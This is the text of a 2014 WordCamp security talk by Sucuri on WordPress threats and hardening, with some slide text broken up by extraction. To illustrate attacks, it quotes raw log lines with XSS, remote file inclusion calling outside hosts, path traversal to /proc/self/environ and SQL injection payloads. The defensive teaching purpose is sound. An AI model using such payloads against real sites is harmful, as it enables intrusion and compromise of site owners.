wordcamp minneapolis 2014 - website security presentation - sucuri security

It’s About the Basics Website Security (WordPress

04/07/2023

# WHOIS PEREZBOX Organization

Sucuri, Inc. Co-Founder Chief Operating Officer @sucuri_security @perezbox

Specialization: Website Security Incident Handling Log Analysis

Special Interests: Working Out Brazilian JiuJitsu

Tony Perez | @perezbox | @sucuri_security 2

04/07/2023

Website Security Company

Global Operations

Platform Agnostic (i.e., Joomla, WordPress, etc..)

Scan 2M Unique Domains a Month

Block 4M web attacks a Month

Remediate 400 – 500 websites a day

Signature / Heuristic Based

24/7 operations


04/07/2023

Today’s Discussion

Trends Threats Defenses


SIMPLE RIGHT?

04/07/2023

Trends


04/07/2023

2013 – Year of the Mega Breach


Data Breaches (Millions)

2011 2013

~230%

04/07/2023

Anatomy of Malicious Websites

Malicious WebsitesLegitimate Websites


85%

04/07/2023

Legitimate Websites

Not-ExploitableExploitable

77%

Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 8

1 in 8 - Critical Vulnerability

04/07/2023

Malware Distribution

Remot

e iFr

ame I

ncludes

Remot

e Jav

aScri

pt Inclu

des

SPAM Injec

tions

Obfusc

ated

/ En

coded

Java

Script

Conditi

onal

Redire

cts

Deface

ments

Other

26%

19%16% 14%

11%

4%

10%


04/07/2023

Malicious Links


Malicious

Links

Social Media

Email Links Website

Text Messag

es

04/07/2023

Spear Phishing / Phishing Increase


93% Increase in 2013

04/07/2023

Beyond The Application Layer


Darkleech

Cdork (Apache

)

Ebury (SSH)

Email Server (SPAM)

Going Deeper than the application layer, targeting the server.

Server Polymorphism – a.k.a highly adaptive / sophistication

Heartbleed

(OpenSSL)

04/07/2023

HeartBleed


04/07/2023

Search Engine Poisoning (SEP) Pharmacy Payday Loans


04/07/2023

Automated Attacks

WP-ADMIN

Themes /

PluginsPayloa

d


Exploiting Access Control

04/07/2023

Soup Kitchen Servers


Site 1

Site 2Site 3

Site 4

Cross-Site Contamination

04/07/2023

Drive By Downloads


04/07/2023

Targeting Zero Days


04/07/2023

Targeting Mobile Devices


04/07/2023

Google is On Fire


04/07/2023

Brute Force Attacks


04/07/2023

Denial of Service (DOS)


04/07/2023

Brute Force vs Denial of Service


04/07/2023

Exploiting Trust


04/07/2023

There’s a Tool for that Explosion in the Malware

as a Service (MaaS) trade Yes, pay someone to hack

for you

Different tools to break in and generate payloads Brute force and

vulnerability exploits Malware Payloads

Blackhole Exploit Author Arrested


04/07/2023

Exploit kit Market in Flux

25%

22%

9%1%10%

5%

11%

10%5% Neutrino

Unknown KitRedkitSweetOrangeStyxGlazunov/SibhostNuclearBlackhole/CoolOther


04/07/2023

Don’t Worry, Everyone is a “Target”


04/07/2023

Threats


04/07/2023

Anatomy of Web Attacks

Recon Identify Attack Decisions Sustain


Use for malware? Burrow into network? Steal data?

What kind of website do you have?

04/07/2023

Five Stages of an Attack


04/07/2023

Cross-Site Scripting (XSS)


38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268

Stored Reflective

04/07/2023

iFrame Injections


04/07/2023

[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”

83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”

82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Remote / Local File Inclusion (RFI)


http://wordpress.com.4creatus.com/info.php

04/07/2023

SQL Injection


62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”

04/07/2023

Spear Phishing


04/07/2023

Backdoors


04/07/2023

Free is not always Free http://blog.sucuri.net/2014/03/unmasking-free-pr

emium-wordpress-plugins.html


- SEOPresser- Payload located: wp-content/plugins/seo-pressor(gratuit)- File: central.class.php

- Flat Skins Pack Extension- Payload located: wp-content/restrict-content-pro/includes/- File: sidebar.php

- Restrict Content Pro- Paylaod located: wp-content/ubermenu-skins-flat

http://blog.sucuri.net/2014/03/unmasking-free-premium-wordpress-plugins.html



04/07/2023

What’s all this mean?

Brand Reputation Legal Implications Impact to Sales Blacklisted by

Search Engines Blacklisted by

Payment processors Worst Day Of your

Life


04/07/2023

Defenses


04/07/2023

Our Insight Come From

Sucuri properties suffer: ~125,000 web based

attacks a month on average

~4,000 attacks a day▪ This spikes on occasion

Doesn’t include server level attacks

All flavors of attacks


04/07/2023

Areas to Focus On

Principles Access Control Vulnerabilities


04/07/2023

Manage your expectations

“It’s about risk reduction… risk will never be zero…”


04/07/2023

Defense in Depth

“…a concept in which multiple layers of security controls (defenses) are placed throughout an information

technology (IT) system. Its intent is to provide redundancy in the event a

security control fails or a vulnerability is exploited…”


04/07/2023

Access

Passwords


Complex – Long - Unique

04/07/2023

Principle of Least Privileged

“requires that in a particular abstraction layer of a computing

environment, every module (such as a process, a user or a program

depending on the subject) must be able to access only the information

and resources that are necessary for its legitimate purpose.”


04/07/2023

Disable PHP Execution


PHP Execution, disable it:

/wp-includes /wp-content /themes /plugins /uploads

<Files *.php>Deny from all</Files>

04/07/2023

Disable Plugin / Theme Editor WP-CONFIG File Modification

#Disable Plugin / Theme EditorDefine(‘DISALLOW_FILE_EDIT’,true);


04/07/2023

Please Backup


04/07/2023

Stay Current (Update)


NOT THAT HARD!!!!

04/07/2023

Software Vulnerabilities


04/07/2023

Biggest Weakness / Vulnerability


04/07/2023

Simple Steps to Risk Reduction


1. Employ Website Firewall

2. Don’t let WordPress write to itself

3. Filter Access by IP 4. Use a dedicated

server / VPS5. Monitor all Activity

(Logging)6. Enable SSL for

transactions7. Keep environment

current (patched)8. No Soup Kitchen

Servers

Ideal implementations:

1. Connect Securely – SFTP / SSH

2. Authentication Keys / wp-config

3. Use Trusted Sources4. Use a local Antivirus – MAC

too5. Permissions - D 755 | F 6446. Least Privileged Principles7. Accountability8. Backups – Include Database

The Bare Minimum:

04/07/2023

10 Stupid Mindsets / Actions1. Fix index.php file and assume all is fine.

2. Panic your way into WordPress Forums after hack.

3. Don’t worry about updating.

4. Trust third-party extensions.

5. Apply all upgrades on live site.

6. Install and forget, all is well with your new site.

7. Use the same username and password for everything.

8. Don’t waste time making security adjustments to PHP and settings.

9. No regular backups required.

10. Use the cheapest host.


04/07/2023

Notable Resources


Name Tool

Sucuri Blog http://blog.sucuri.net

Sucuri TV http://sucuri.tv

Malware Scanner http://sitecheck.sucuri.net

Malware Scanner http://unmaskparasites.com

Badware Busters https://badwarebusters.org

Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress

Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked

WordPress Hardening http://codex.wordpress.org/Hardening_WordPress

http://blog.sucuri.net/

http://sucuri.tv/

http://sitecheck.sucuri.net/

http://unmaskparasites.com/

https://badwarebusters.org/

http://productforums.google.com/forum/%23!categories/webmasters/malware--hacked-sites

http://productforums.google.com/forum/%23!categories/webmasters/malware--hacked-sites

http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633

http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633

http://secunia.com/community/advisories/search/?search=wordpress




http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31

http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://codex.wordpress.org/Hardening_WordPress

04/07/2023

Questions?


Sucuri, Inc.Tony Perez

http://sucuri.nethttp://blog.sucuri.net

@perezbox | @sucuri_security

http://sucuri.net/



wordcamp minneapolis 2014 - website security presentation - sucuri security

Presentations & Public Speaking

4292014 tony

php http1

payload located

windows nt

gecko20100115

amp

windows

wordpress